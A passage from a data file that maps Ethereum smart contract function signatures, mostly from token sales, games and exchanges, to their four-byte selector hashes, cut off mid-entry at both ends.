"EtherModifierMoops()": "0xbca2bbc0", "getRandomNumber(address)": "0x3b6dde13", "doQuest(uint256)": "0xefce079e", "DecenturionToken(uint256)": "0x5827834a", "ETH500on719()": "0xa36a48a5", "NIGIZ()": "0x12706ccd", "UnitedToken()": "0x89bc0e6e", "BaseToken()": "0x90f81702", "MoneroClassic()": "0x13065fed", "makeupShiny(uint256)": "0x5d9d8dd9", "makeupLegendary(uint256)": "0x082e0f6f", "recommit(uint256)": "0x45d63b66", "_purchase(address,uint16,address)": "0x97ac37de", "purchaseFor(address,uint16,address)": "0xb01d5b63", "setPacksPerClaim(uint16)": "0x9a1f6a0f", "setTokenReward(address,address)": "0xb97df70a", "giveTo(uint256,address)": "0x20ea31f8", "arand(address,uint256)": "0x507a83ea", "limitbreak_RELEASE()": "0x13ccca96", "limitbreak_contrib()": "0xb9b7b68c", "add_luck(bytes32)": "0x06137c9d", "fortune_endauction(uint256)": "0x3e46eb60", "fortune_bid(uint256)": "0x68dbc6c1", "fortune_sell(uint256,uint256,uint256)": "0x1dd572a0", "fortune_setimgnme(uint256,bytes32[144],bytes32)": "0xecc0ee18", "fortune_open(uint256)": "0x2d66acf1", "fortune_new()": "0x008250e5", "ret_img(uint256)": "0xf8dfaa1e", "ret_luklen()": "0xb792f5f6", "ret_len()": "0xd6feecde", "is_owned(uint256)": "0x39b09ed8", "efw()": "0xd37360a0", "setNumberOfPlayers(uint256)": "0x71b6a376", "transferRevenue(address,address,uint256)": "0xab2a4f8a", "_newCampaign()": "0x905d326c", "finalizeCampaign(uint256)": "0x6b5ca27d", "finalizeLastCampaign()": "0xed2c92b1", "setCharityBeneficiary(address)": "0x61c3b7f1", "setAccountingParams(uint256,uint256,uint256)": "0xdebe1c69", "setButtonParams(uint256,uint256,uint32,uint32)": "0xa78adfec", "withdrawBaseERC20(address)": "0xae180337", "withdrawBaseETH()": "0xde47e0bf", "redeemSurplusERC20(address)": "0x91b7d3e0", "redeemSurplusETH()": "0xa0129b00", "sendCharityETH(bytes)": "0xf63ef744", "hasWon(address)": "0xa52b2b88", "totalRevenue()": "0xbf2d9e0b", "totalCharity()": "0xd608b3b2", "totalPresses()": "0x2741876a", "nextCampaignBalance()": "0x0b781385", "revenueBalance()": "0xa6cfbb7f", "charityBalance()": "0x99b8a3f0", "lastPresser()": "0xec18ca9c", "presses()": "0x682e60a9", "period()": "0xef78d4fd", "priceMultiplier()": "0xd50cb88b", "charityFraction()": "0xf4aac034", "maxReward()": "0x66a78e6c", "MELONPORT_COMPANY_STAKE()": "0x92f7ba17", "firstWeekPreICOBonusEstimate()": "0xb2bbac16", "bonusFirstWeek()": "0xcde40bc8", "ClimateCoinAddress()": "0xdf0584af", "initialMoySupply()": "0x29aebf05", "masternodeDeregister()": "0x61116d1d", "platContract()": "0x43d77c7b", "Police_1()": "0xcf310642", "getRoundStats()": "0xd015d86f", "tokenFrozenUntilBlock()": "0x91a67e1e", "eachAirDropAmount()": "0x9e69940d", "raiseDay1()": "0x8b22e1df", "preSale2()": "0x11a88e05", "times6()": "0x1ae638f7", "getIcoDeflator()": "0x4fa232fe", "startCrowdsaleTime()": "0xa7b8c868", "erc223()": "0xebf0da65", "GetMaxStageEthAmount()": "0xe4454fdc", "numberOfCrySolObjects()": "0xd88b0815", "addressOfTokenUsedAsReward1()": "0x6fd463ed", "SEHR_WALLET_ADDRESS()": "0x878e10e4", "maxRound()": "0x93c2f482", "GetEther()": "0x45b5a47a", "totalVestedAmount()": "0x64893fcb", "feePayee()": "0x082442f5", "isVotingActive()": "0x47cf6f76", "preIcoMaxCap()": "0xa767d8be", "feeCalculator()": "0xb00eb9fe", "gameLength()": "0xfbde5b64", "ico2Min()": "0x783680a7", "periodICOStage8()": "0x46f04694", "maxQtyInFp()": "0xf0247f78", "managerIsPaused()": "0xf77ca208", "openSoldTokens()": "0xb2450b15", "initialEndPrice()": "0x6e556725", "RELEASE_THRESHOLD()": "0xef233f5c", "advisorsTokensFirstReleaseTime()": "0x1b27c873", "mintTreasuryTokens()": "0xa1a7e68b", "currentQuestionId()": "0x15da65a5", "defaultBuyNowPrice()": "0xb83506cf", "NULL_ENCRYPTION_ALGORITHM_DESCRIPTION_URI_ID()": "0xb154dea6", "bbFounderCoreStaffWallet()": "0x55dd8171", "numOptions()": "0x4b97aed9", "TermsOfUSe()": "0x0870803d", "pubAddress()": "0xb96528fd", "tixFundDeposit()": "0x86f8bce9", "kittensDroppedToTheWorld()": "0x65db63d0", "getMyWager()": "0x8ef483eb", "chunkSize()": "0xc4a942cb", "filled()": "0x5c0133d9", "DATE_PRESALE_END()": "0x5ef79434", "showNumber()": "0x76dad223", "allowedAddr()": "0x16a27019", "walletTeamAdvisors()": "0x66fc0dd7", "NAORIS_TEAM_TOKENS()": "0xa775b1c4", "SALE_4WEEK_BONUS()": "0xf805b300", "ATTR_EXPLORABLE()": "0xf2d5866d", "bonusEnds20()": "0xae457dab", "Funding_Setting_funding_time_end()": "0xada65728", "redTeamSupply()": "0x2448fe2f", "INITIAL_FOUNDER_SUPPLY()": "0xd661d206", "purchaseCrate()": "0xceb2731a", "cooAddress2()": "0x18f3a50d", "lockController()": "0x02f08568", "units()": "0x976a8435", "lockJackpots()": "0xa841da4b", "maxCapMain()": "0xd0dad7e1", "allocatedBonus()": "0x6a457ee9", "forBounty()": "0xc7c5f59d", "communityDevelopmentSupply()": "0x0b87572b", "totalSoldToken()": "0x30dd6a42", "BLOCK_DURATION()": "0x1b8beafe", "openSaleEndTime()": "0xe58018c5", "bids_burned_count()": "0x1771b7dc", "privatesaleSupply()": "0x13ff962a", "segundos()": "0x4142f460", "thisContract()": "0x891e6f43", "isSaleClockAuctionStorage()": "0x278af72c", "investment_address()": "0x0114af17", "voteUID()": "0x0a9ff623", "XferMoneyMarketing()": "0xc0517c5a", "unlb()": "0x83c1f2e6", "SBT()": "0xa323a748", "upgradedContractAddress()": "0x0da2e088", "MINIMUM_VESTING_PERIOD()": "0x3f74a3b7", "airDropPercent()": "0xd9a2fff5", "sumPreICO1()": "0xea8af87d", "EEMWallet()": "0x1609bdf2", "hasOpened()": "0xbe8eef8e", "the_address_for_option_D()": "0xa16085ce", "bonusEnd10()": "0x541ee050", "totalAmountOnICO()": "0x6f784c5b", "latestEthTxRequest()": "0xc09a4ef4", "G2UFundDeposit()": "0x6d580320", "perTokenAmount()": "0x80c8fde7", "tokenApproves()": "0x92d44650", "maxMultiRolls()": "0x21f3ff41", "saleEnd2()": "0xe22d1581", "c_centsPerToken()": "0xa669d972", "frozenTransferFrom(address,address,uint256,uint256,bool)": "0xef18e458", "frozenTransfer(address,uint256,uint256,bool)": "0x5ab92022", "frozenCell(address,uint256)": "0xf27a73ca", "frozenCellCount(address)": "0x7696f0db", "availableBalanceOf(address)": "0x25d998bb", "setKYCProvider(address)": "0xc24366f0", "transferRoot(address)": "0xc296302a", "TUBE()": "0x1c0ce15f", "SetFreeQDA(uint256)": "0x97c6006e", "SetupQDA(string,string,uint256,uint256,uint256,address,address,uint256)": "0xdc2ba357", "QuadrantAssets()": "0x039f6b28", "JoshuaCoin()": "0x80570d69", "icoIsFinished()": "0x980054be", "_char(bytes1)": "0xd60d7044", "_hashToAscii(bytes32)": "0x61463b64", "_distinctOwners(address,address)": "0xe9813f9c", "_messageToRecover(address,uint256)": "0x5d7c829d", "_validSignature(address,uint256,uint8,bytes32,bytes32,uint8,bytes32,bytes32)": "0x5411029d", "spend(address,uint256,uint8,bytes32,bytes32,uint8,bytes32,bytes32)": "0xbb6d203c", "generateMessageToSign(address,uint256)": "0xd0590bad", "TrezorMultiSig2of3(address,address,address)": "0x1d60208a", "endCrowdfund(address)": "0xe75afb65", "setEtherRate(uint256)": "0x88672f82", "activeCrowdsalePhase3(uint256)": "0x4f1d38c0", "activeCrowdsalePhase2(uint256)": "0x104fea4c", "activeCrowdsalePhase1(uint256)": "0xcdf6ddb4", "activePresale(uint256)": "0x0820b7c9", "endPrivatesale()": "0x12a3ff95", "DAZToken()": "0x76d738d9", "invest(uint256)": "0x2afcf480", "viewMaxGasPrice()": "0xdea0cbd7", "valueOnContract()": "0x20226e17", "changeBuyFlag(bool)": "0x8884cd7c", "viewTokenName(uint8)": "0x0ebc1568", "updateEthICOThresholds(uint256,uint256,uint256,uint256,uint256)": "0xc66bd6aa", "getTokensAvailableForSale()": "0xe646350d", "recordPayment(uint256,uint256,uint256)": "0xac281ca6", "DeepToken(address,address,address,address,address)": "0xa2df7465", "setStopTime(uint256)": "0xc92501b7", "OffGridParadise(string,string)": "0xcd875247", "TokenERC20(string,string)": "0xb02f1edc", "FMGHEALTHCARE()": "0x946ae8df", "MICE(uint256,string,string)": "0x05c35eb6", "collect_main_fee()": "0x9d2cd67c", "collect_fee(string)": "0xe7b1a7ae", "trade(string,uint256,uint256)": "0x1dffdbe6", "buy(string,uint256,uint256)": "0x9b0a5e67", "sell(string,uint256,uint256)": "0x04804ee8", "total_amount(string,uint256,uint256)": "0x2bd4aa40", "get_price(string)": "0x6330ac09", "get_order(string,uint256)": "0xe612a4b6", "get_order_book_length(string)": "0x7cbba335", "get_etc_balance(address)": "0x1b5c9ae3", "get_balance(address,string)": "0xc01d8280", "get_coin(uint256)": "0x45f0db24", "get_coins_count()": "0x5d4559ca", "get_deploy_fee()": "0x7d6cf2df", "get_taker_fee()": "0x788efb9e", "get_maker_fee()": "0x855eafa7", "set_coin_minimum_trade(string,uint256)": "0xe95d74e0", "get_minimum_trade()": "0x7b3051db", "set_minimum_trade(uint256)": "0xeca6e42d", "set_fee(uint256,uint256,uint256)": "0x7b8bf4fd", "remove_coin(uint256)": "0xf29f7b1b", "approve_coin(string,bool)": "0xc5346fb1", "createToken(string,string,address,address,uint8)": "0x1627d3f2", "add_coin(string,string,address,uint8)": "0xf780d867", "safe_sub(uint256,uint256)": "0xd9637826", "safe_add(uint256,uint256)": "0xf703601e", "safe_mul(uint256,uint256)": "0x0ea17a76", "require(bool)": "0xfaa10f43", "ERC20dex()": "0x08404ac8", "VisualChain()": "0x04de76cf", "GTN()": "0x5cda31dd", "setMinimumTokenSell(uint16)": "0xc28eab85", "setTokenRate(uint32)": "0xc4a381b8", "_redeemSameClassAdoptedAxies(address,uint8,uint256)": "0x223e9f17", "_applyRefCredits(address,uint256)": "0xb711e18a", "_adoptSameClassAxies(address,uint8,uint256,address)": "0x42d1b202", "_sameClassAxiesPrice(uint8,uint256)": "0x4341274f", "mintRefCredits(address,uint256)": "0x3999968c", "numRewardedAxies(address,bool)": "0x6694e845", "totalRewardedAxies(bool)": "0xd52a7e86", "numRefCredits(address,bool)": "0xfdf55523", "numAdoptedAxies(address,uint8,bool)": "0xcc17aa28", "totalAdoptedAxies(uint8,bool)": "0x172c61e6", "setRedemptionAddress(address)": "0xcc7e1b9a", "AxiePresaleExtended()": "0x27aeeaa8", "_redeemAdoptedAxies(address,uint8,uint256)": "0xb9272a11", "_adoptAxies(address,uint8,uint256,address)": "0x55d56ddd", "_axiesPrice(uint8,uint256)": "0x28470b40", "redeemRewardedAxies(address,uint256)": "0xd2b1569e", "redeemAdoptedAxies(address,uint256,uint256,uint256)": "0xbfce8cbf", "adoptAxies(uint256,uint256,uint256,address)": "0x0c636091", "axiesPrice(uint256,uint256,uint256)": "0x852c061a", "AxiePresale()": "0xbe20d298", "mintFoundersRewards(address,int256)": "0x4c31a0ca", "POSC()": "0xc50d847e", "set_stoptransfer(bool)": "0xf0d1d021", "set_stopsell(bool)": "0x370fc812", "finishPVP()": "0x534e3f81", "_computeCycleSkip()": "0x64996a43", "_packPVPData()": "0xdd27efa0", "_noMatchingPairs()": "0x79f1a6ef", "_triggerNewPVPContender(address,uint256,uint256)": "0x46cd9b23", "_clarifyPVPSchedule()": "0xc112411e", "canFinishPVP()": "0x4a776104", "getPVPState()": "0x6147bcb9", "maxPVPContenders()": "0xf15a9ae8", "indexOf(uint256)": "0x91ac7e65", "_computeTournamentCut(uint256)": "0x1d98532f", "_computePVPBeneficiaryFee(uint256)": "0xbb70abfa", "_computeIncentiveCut(uint256,uint256)": "0x4ba8fde0", "_computeIncentiveReward(uint256,uint256)": "0x6d96b537", "_getPVPContendersCut(uint256)": "0x64e4596e", "_computePVPReward(uint256,uint256)": "0xdac1e5e5", "_getPVPFeeByLevel(uint256)": "0x79c3f694", "setPVPEntranceFee(uint256)": "0x5c7d6425", "_scheduleTournament()": "0x4f653f09", "getTournamentAdmissionBlock()": "0x54070f83", "sendBooty(address,uint256)": "0x1fcbbefa", "grabBooty()": "0x0ca435a6", "PVP(uint256,uint256,uint256)": "0xec651551", "getWarrior(uint256)": "0x29372ad0", "getWarriorOwners(uint256[])": "0x115a43e9", "getWarriorsFromIndex(uint256,uint256)": "0xe92f9c1d", "getWarriors(uint256[])": "0x856dc78e", "CryptoWarriorCore()": "0x16b6824c", "recoveryDone()": "0xaf791df2", "recoverWarriors(uint256[],address[])": "0x879a6f7a", "_computeNextMinerPrice()": "0x17f7a530", "createMinerAuction()": "0xcef6a39a", "_setIDLE(uint256)": "0x72f12814", "signUpForTournament(uint256[])": "0x63fd91dc", "_grandPVPLoserReward(uint256)": "0xdd1a5f0d", "_grandPVPWinnerReward(uint256)": "0x309c3ee2", "signUpForPVP(uint256)": "0x4dbdb0fd", "_triggerPVPSignUp(uint256,uint256)": "0x4e542bff", "setBattleProviderAddress(address,address)": "0x03976b0e", "ariseWarrior(uint256,address,uint256)": "0x5ae82dfd", "burnWarrior(uint256,address)": "0xb639c9ec", "finishPVEBatch(uint256[])": "0xc0e91320", "finishPVE(uint256)": "0x2200cdec", "_triggerPVEFinish(uint256)": "0xfd3cabc0", "startPVE(uint256)": "0x5f689fed", "_triggerPVEStart(uint256)": "0xd9d770bb", "getPVEDuration(uint256)": "0x0763b78b", "getPVECooldown(uint256)": "0x8aabff06", "setPVEBattleFee(uint256)": "0x003ead5f", "setSanctuaryAddress(address,address)": "0x41d0fcb6", "tokensOfOwnerFromIndex(address,uint256,uint256)": "0x2b58e202", "_createWarrior(uint256,address,uint256,uint256,uint256,uint256)": "0x1ec42d50", "_clearApproval(uint256)": "0xab3d2e74", "_getLevel(uint256)": "0x40e0653c", "isMatching(int256,int256,int256)": "0x9660aeeb", "getRatingRange(uint256,uint256,uint256)": "0x4d3fac53", "_computeContendersTotalHp(uint256,uint256,uint256,uint256,uint256,uint256)": "0x32643513", "_computePVPWarriorAura(uint256,uint256)": "0xb6a499ab", "_computePVPPetAura(uint256)": "0xb7643c5c", "getPVPBattleResult(uint256,uint256,uint256)": "0x5ea6474d", "getBattleRandom(uint256,uint256)": "0xe63da84c", "getPenetration(uint256,uint256,uint256)": "0xb49e3b62", "getDamage(uint256,uint256,uint256)": "0x9a4cbb92", "_getProtectionParams(uint256,uint256,uint256)": "0x9c7409b0", "_applyLevelBonus(int256,uint256)": "0xe5ddb19d", "_getTotalHp(int256,int256,int256,int256)": "0x0d24317d", "getTotalHP(uint256,uint256,uint256,int256)": "0xc603a4e3", "getCombinedTotalHP(uint256,int256)": "0x7c34e853", "_getBattleResult(int256,int256,int256,int256,uint256)": "0xed62986b", "getTournamentBattleResult(int256,int256,uint256,uint256,uint256)": "0xa3030b10", "_getTournamentBattles(uint256)": "0xaf1380ad", "filterWarriorAuras(uint256,uint256)": "0x99e1d127", "enableAura(uint256,uint256)": "0xe7c8f61e", "isAuraSet(uint256,uint256)": "0x17b98723", "_unpackAttackParams(uint256)": "0xc31453a7", "_unpackProtectionParams(uint256)": "0x363dc725", "_packCombinedParams(int256,int256,int256,int256,int256)": "0xfddf4e3b", "_unpackWarriorId(uint256,uint256)": "0xb5e8077c", "_packWarriorPvpData(uint256,uint256,uint256,uint256,uint256)": "0x5514738f", "_packWarriorCommonData(uint256,uint256)": "0xde2c1e85", "_changeCycleValue(uint256,uint256)": "0x57fa7044", "_unpackRatingValue(uint256)": "0x5e0b1597", "_unpackCycleValue(uint256)": "0xb07e4e34", "_unpackIdValue(uint256)": "0x814e6d44", "_unpackAuraValue(uint256)": "0x50c4b64c", "_unpackPetValue(uint256)": "0x928d20fc", "_unpackBaseDamageValue(uint256)": "0x367f20f6", "_unpackStrengthValue(uint256)": "0xeb70e13e", "_unpackAgilityValue(uint256)": "0x6a59dc8c", "_unpackIntelligenceValue(uint256)": "0xefab4b91", "_unpackLevelValue(uint256)": "0x9d9231b1", "_unpackExpValue(uint256)": "0x7cbd3508", "_unpackRarityValue(uint256)": "0x0440c8e4", "_unpackRarityBonusValue(uint256)": "0x03b0e428", "_unpackClassValue(uint256)": "0x83f5e360", "_getMaxRarityChance()": "0xc4405fa7", "_getTargetBlock(uint256)": "0xbafdaf5e", "_random(uint256,uint256,uint256)": "0x3552f552", "_random(uint256,uint256,uint256,uint256,uint256)": "0xf4734818", "_shuffleParams(uint256,uint256,uint256,uint256)": "0xb133f39b", "ClearView()": "0xc1bc2664", "batchAirDrop(address[],uint256[])": "0xe6c35a91", "batchReservedTokenAllocation(address[],uint256[])": "0x6267967b", "GEXAirDrop(address)": "0x2096c958", "LRXCOIN()": "0xeff60f56", "BillHenryTestCoin()": "0x48144ef6", "createCountry(string,string,uint256)": "0x7eeb5906", "getCountriesCount()": "0xdc667d0c", "ERC20Token(string)": "0x44fd1557", "RoboToken(uint256)": "0xe3552808", "getBonusTokens(uint256,uint256,uint256)": "0x5df285c8", "pouseCrowdsale()": "0xc7172710", "turnOnIco()": "0xc724772c", "turnOnPresale()": "0x267490aa", "getCurrentWeek(uint256,uint256)": "0xed786cd6", "Balances_of(address)": "0xb1a3c6b4", "totalsuplly()": "0x0c5d919d", "activeStarGenome(address)": "0xe9986f90", "setStarData(uint256,uint16,uint16,uint32,uint32,uint32,uint64,uint64)": "0xf082650b", "Aktium()": "0x1964569b", "transferPreSignedHashingWithPrefix(address,address,uint256,uint256,uint256,uint256)": "0xc92d2385", "transferPreSignedHashing(address,address,uint256,uint256,uint256,uint256)": "0x0a0fb66b", "transferPreSigned(bytes,address,uint256,uint256,uint256,uint256)": "0x848784e5", "adminDeposit(address)": "0x57db8024", "isDepositAllowed()": "0x4d444fac", "transferTokensFromSpecialAddress(address,address,uint256)": "0xf606b648", "setDateStartTransfer(uint256)": "0xb4b4ff0a", "setDateRelease(uint256)": "0x5cf89f1e", "freezeTo(address,uint256)": "0x6638d82f", "createUser(string,uint256)": "0x121ef243", "etherToSendJackpot()": "0xba63defb", "payJackpot()": "0x30406423", "Elyxr()": "0xe10aa985", "AcceptsElyxr(address)": "0x689b2d24", "getLastRoundInfo(uint256)": "0x23ae4438", "withDrawTips()": "0x0a5a1e9a", "increasePieceCount(uint256)": "0xfb70ff96", "finishRound(uint256)": "0x1fe0ff58", "makeBet(uint256,uint256,uint256)": "0x779a3611", "WheelOfFortune(uint256)": "0xe9a5605d", "MedNet()": "0xdeb2e0b9", "EuroToken()": "0xf11af32a", "generateCryptsyToken(uint32,uint32,uint32)": "0xedebb8c5", "_createCryptsy(uint32,uint32,uint32,address)": "0x0a19283c", "TestPersandToken()": "0xb1723215", "TheBillionCoin()": "0xa24a21fa", "minecoin()": "0x096f4090", "SearchALLFileLength()": "0xd0c32ea9", "creatUserPurchase(address,string)": "0xe40652e3", "SearchUserPurchase(address,string)": "0x35554e58", "SearchIPR(string,address)": "0xbceeeb9a", "HashToFileName(string)": "0xa9405f4f", "SetIPR(string,string,address,string,string,uint256,string,string)": "0xdcfe8eb4", "checkStoredFileName(string)": "0x101d52d2", "checkStoredFile(string)": "0xab8a288b", "getName(string,string,address)": "0xc8ca645f", "ownFiles(address,string,string)": "0x5d6d2992", "setFile(string,string,uint256,string,string)": "0x134c91be", "setAuthor(string,string,address)": "0x46f25cad", "getA(string)": "0xa0acb9dd", "giveArraywords(string)": "0x16ee94bf", "payMoneytoAuthor(address)": "0x55d9275e", "payMoneytoOwner()": "0x9b80c9e8", "eugToken()": "0x5b1aa9b1", "PissToken()": "0x7df3a229", "ERC223TestToken(string,string,uint8,uint256,address)": "0x5e9afc0e", "donkeyCoin()": "0x01a68a94", "initialize(string,string,address)": "0x077f224a", "setLANDRegistry(address)": "0x535a920c", "initialize(string,string)": "0x4cd88b76", "validateMigrationIsPending(string,string)": "0xac62ddb2", "transferTokenOwnership(address,address,uint16)": "0xcac625e6", "firstTokenId(address)": "0x33065ac5", "ownerOf(uint16)": "0x82a7cf1e", "createTokens(bytes32[])": "0x89337e84", "speech(uint16)": "0xa2d46832", "genEOS()": "0xb342d7c0", "TangToken()": "0x40c7535b", "setValue(int256)": "0x5093dc7d", "callTest(address,address,uint256,bytes,string)": "0x8feaa243", "makeInvestment(address,address,uint256,uint256,address)": "0xbb71a7c3", "EthereumGold()": "0x46a9d680", "cancelTrade(address,address,uint256,uint256,uint256)": "0xf3d97a25", "confirmTrade(address,address,uint256,uint256,uint256,uint8,bytes32,bytes32)": "0x22347d5b", "giveaway(address,uint256)": "0x050225ea", "levelUpByPenguinId(uint256)": "0x2c3ccb98", "getLevelUpFeeByLevel(uint256)": "0xb1826ee7", "getBaseLevelUpFee()": "0x26bf02cf", "setBaseLevelUpFee(uint256)": "0x33ab0541", "getPenguinsByOwner(address)": "0xda337465", "createPenguin(string,uint256,uint256)": "0x5c91cdfa", "_createPenguin(string,uint256,uint256)": "0x5e8e9589", "sendBatches(address[],uint256)": "0x0e6f21f2", "TxAttackWallet()": "0x4e10c212", "updateAppExec(bytes32,address)": "0xebe599aa", "updateAppInstance(bytes32)": "0x6c9fca89", "SpaceCoinToken(address,string,string,uint256,uint256)": "0xb2cc0eb3", "getFrozenAccountCoinCount(address)": "0x48fcb4e8", "_calFrozenAccountCoin(address)": "0x15a60b76", "frozenAccountCoinByHour(address,uint256,uint256)": "0x46203efe", "burritoPoolTotal()": "0x35209715", "aelfDevMultisig()": "0x386b5fe7", "terminated()": "0x194307bf", "logicAddress()": "0x9c1fcc4c", "DEVELOPER_BONUS()": "0x23587733", "o1Address()": "0xe2306253", "bountyCount()": "0x3e362c96", "volumeType2()": "0x3cc75749", "TOKEN_SUPPLY_SEED_PRESALE_LIMIT()": "0xbf716708", "TOKEN_PRESALE()": "0x910545ff", "hasFiveYearWithdraw()": "0x870b8b94", "pillarTokenFactory()": "0xd02f5463", "trinityDataContract()": "0xbb2bded0", "Rate9()": "0x1c5caa6b", "privateLockTime()": "0x68b43f38", "girlBasicToken()": "0xf534d187", "minimumPurchaseLimit()": "0xefca9f09", "preICOWeiRaised()": "0x9da0dc0a", "zReceiveFunds()": "0x815ec64a", "initialBlockCount()": "0xe5f65c71", "ISC()": "0x503129c3", "tokensSentDev()": "0x878a18ef", "warrior()": "0xe3f52c99", "bouleDevMultisig()": "0x3528351d", "TEAM_AMOUNT()": "0x8b32f62a", "earlyCommunitySupply()": "0x76496e34", "weiCap()": "0x84fe5029", "MAX_GRANTEE_TOKENS_ALLOWED()": "0x66f4e1c7", "sucessor()": "0xc66aaf0f", "NewStatic()": "0x7af0ed7e", "reliefRatio()": "0x64801da1", "privateEtherFunded()": "0x3135471d", "requestCancellationMinimumTime()": "0x57938b2a", "ico1total()": "0x00d4b959", "lastBlock_v12Hash_uint256()": "0x20ec0f01", "text()": "0x1f1bd692", "secondTeamWithdrawal()": "0x170eb245", "dividendFee_()": "0xa0452bfb", "MINI_GAME_BONUS()": "0x744d0a92", "Announcements()": "0x4ef45cac", "For_admin()": "0x8015a96d", "MAX_LENGTH()": "0xa6f9885c", "TOKEN_PER_ETHER()": "0x750c47a1", "totalPaidAmount()": "0xa5ce3eb0", "getChronus()": "0x5ad6ba47", "latest_buy_time()": "0x13a22af9", "controllar_account()": "0x941a5074", "weiPerEther()": "0xf7c58b62", "m_totalInvested()": "0x033c44c3", "tatalEthFromBuyer()": "0xc21abf05", "isAllocated9()": "0xe689aa66", "issuedTokensAmount()": "0xe69b414b", "registrationFee_()": "0x180603eb", "STARTING_RickAndMorty()": "0x801336cb", "tkt()": "0x5ac72734", "frontWindowAdjustmentRatio()": "0xb91d4a0f", "sunsetWithdrawalPeriod()": "0x39b8dc40", "buyFee()": "0x47062402", "returnedToOwners()": "0x3267a2c5", "lotteryGiveHuntMinimalNumber()": "0xe028ff3b", "ZILINGGOSupply()": "0xdd28d12b", "hasSuicided()": "0x8b1db910", "getCompetitionStatusOfHopefuls()": "0xb387ed6d", "AboutKelvin()": "0x98f96c3a", "stage_2_tokens_scaled()": "0x0bc5b2c5", "directorTransferShareRequired()": "0xadb6859d", "vernamCrowdSale()": "0x6f320970", "betId()": "0x27bce91b", "superPrivilegeCost()": "0x0965f6ac", "TIMELOCK_DURATION()": "0x4623c81e", "closeSaleAnyway()": "0xd7b53081", "SUPPLY_FOR_TEAM()": "0x932c90f3", "currentSettlementPhase()": "0x1d8aa5ec", "artistManifestoFundAddress()": "0x1eb21875", "burnBasisPoints()": "0x9a436c9b", "lastweek_winner2()": "0xbed6701f", "updatedTime()": "0x43bdfb72", "fundingAddress()": "0xd3b7bfb4", "ZigZagSupply()": "0x11ceb21c", "CLIENT_TIME_TO_DECIDE()": "0x4f7fc13f", "maxGasPriceValue()": "0xb2d111f6", "foundationAmount()": "0x85e36cc2", "endFinalStage1()": "0x43614f8b", "clearTickets()": "0x70c5fc9d", "contract_state()": "0x4aaf6b86", "mintAmount2()": "0xdcdaa35b", "teamVestingStages()": "0x7b777517", "Police_3()": "0x65132ad3", "minTokens()": "0x9d4c5451", "isEIP20Token()": "0x67043001", "RESERVE_AMOUNT()": "0xaf9b192e", "_reserve()": "0x413ab4a8", "eventStatus()": "0x9851fd9a", "fundariaCap()": "0xdb12630a", "latestScheduledUpdate()": "0xc4342252", "getF()": "0x0c204dbc", "maximumInvestmentInWei()": "0x44fc9361", "dayToDate()": "0x113e5b93", "flag_hash()": "0x7d8cfd1a", "barrierStrength()": "0x3b92d384", "setPlayerGeneralDt(uint64,uint32)": "0xffab7dcd", "setPlayerGeneralCd(uint64,uint32)": "0xd347de03", "addPlayerGeneral(address,uint32,uint32,uint8)": "0xfae53222", "getSkillTypeCnt()": "0xff722b08", "getSkillIdByIndexAndLevel(uint8,uint8)": "0xc1d038b2", "getSkill(uint32)": "0x13ad41d8", "getSkillLength()": "0x3dc1a6bc", "getGeneralAttr(uint32,uint8)": "0x47fee755", "getGeneralRelation(uint32)": "0xcd704cb4", "getGeneral(uint32)": "0x74a814fe", "getGeneralLength()": "0x6c50bc2e", "getCost(uint8)": "0x375f2b96", "getCntByRarity(uint8)": "0x8781249f", "getGidOfRarity(uint8,uint8)": "0xfd554229", "setSkill(uint32,uint8,uint32,uint32,uint32,uint32,uint32)": "0x5fbabc49", "setGeneral(uint32,uint8,uint8,uint16,uint16,uint16,uint16,uint32[4],uint32[4],uint8)": "0xd9b02ddf", "setCost(uint8,uint256,uint32)": "0xdf642cad", "tokenLeft()": "0x9679dd7d", "removeCaller(address)": "0xeef21cd2", "maafakaToken()": "0x0852aa9d", "distributePrices(uint256)": "0xe93ba042", "generateNum2Win()": "0xa5ab5479", "resetTime()": "0x65a114f1", "Try2222()": "0x6bd87c86", "LiquidSwapToken()": "0x37eb6f91", "armagedeon(address[])": "0x4970fb36", "MassivelymultiplayeronlineVideoGames()": "0x69d20762", "burnleftToken()": "0xf534b022", "checkLeftToken()": "0x4dbb37eb", "isIcoFinshed()": "0x0e4e0054", "withdrawDevTokens(address,uint256)": "0x27301964", "minMktTokens(address,uint256)": "0x6d9d495f", "isPeronalLock(address)": "0x3e997e71", "HyunJaeToken()": "0xa2362aca", "MMMPCoin()": "0x793318eb", "retrunError()": "0x570919a6", "createCourse(string)": "0x8a38ab2c", "registerUser(string)": "0x704f1b94", "forbidChecking(uint256)": "0xb7e45353", "raiseNumberOfCheckmarks(uint256)": "0xa4975aff", "approveAccess(address)": "0x705211f4", "requestAccess()": "0xeb2f4817", "CleanSweap()": "0x15d99a77", "enroll(address,address,uint256)": "0x154e3f61", "markFunding(address,uint256)": "0x17e6a087", "specifyController(address)": "0x6d66264f", "PruebaCoin()": "0x77f83bce", "EnableRefund()": "0x71b22e61", "investInternal(address,address)": "0xfa7af6fe", "showContractMsgSender(address)": "0x0c763fef", "showApproveToken(address)": "0x611fd026", "tokenTotalSupply(address)": "0x6988e9cc", "showMsgSender()": "0xcd5dd1d0", "changeTransactionStorage(address)": "0x3f5e3ec1", "changeAccountStorage(address)": "0xd864c322", "BaseTransactionService(address,address)": "0x6bdbc918", "getAccountAmount(uint256)": "0xa0218b66", "existAccount(uint256)": "0xa00ee946", "updateAccountAmount(uint256,uint256)": "0x3a300d6b", "updateAccountData(uint256,uint16,bytes32,uint256,uint16,bytes32)": "0xfa6669b7", "DZONetwork()": "0x9f624701", "OSEToken()": "0xf833f984", "FraCoin()": "0xf2108aa8", "mintFraCoins(uint256)": "0x319f3930", "getExCoins()": "0x4766551d", "balanceOfSender()": "0x9993fa94", "TransferCoinsEther()": "0x1cae7c2f", "TransferCoins(address,uint8)": "0xd1d8fd65", "TransferCoinsFrom(address,address,uint8)": "0xed02ada4", "mintFraCoins(address,uint256)": "0xc5133802", "totalBspAmount()": "0x2af38eab", "mintableAmount()": "0xae3baf4d", "changeDistributor(address)": "0x802cd15f", "PONADistributionContract()": "0xeeb64f0c", "ABBCToken()": "0xb30e4533", "DmitryCoin()": "0x12ff658f", "claimByProof(address,bytes32[],bytes32[],uint256)": "0x5513a2ac", "burn(address,bytes32,uint256)": "0x4460fb6d", "claimByProof(bytes32[],bytes32[],uint256)": "0x384d0b12", "burn(bytes32,uint256)": "0x7a408454", "controllerClaim(address,uint256)": "0x80906b13", "controllerBurn(address,bytes32,uint256)": "0xeb81e95a", "setBridgeNode(address,address,bool)": "0x468b0fe2", "setMetadata(bytes32,bytes32)": "0xd3525adf", "setLocked(address,uint256)": "0x73845cfa", "setProof(uint256,bytes32)": 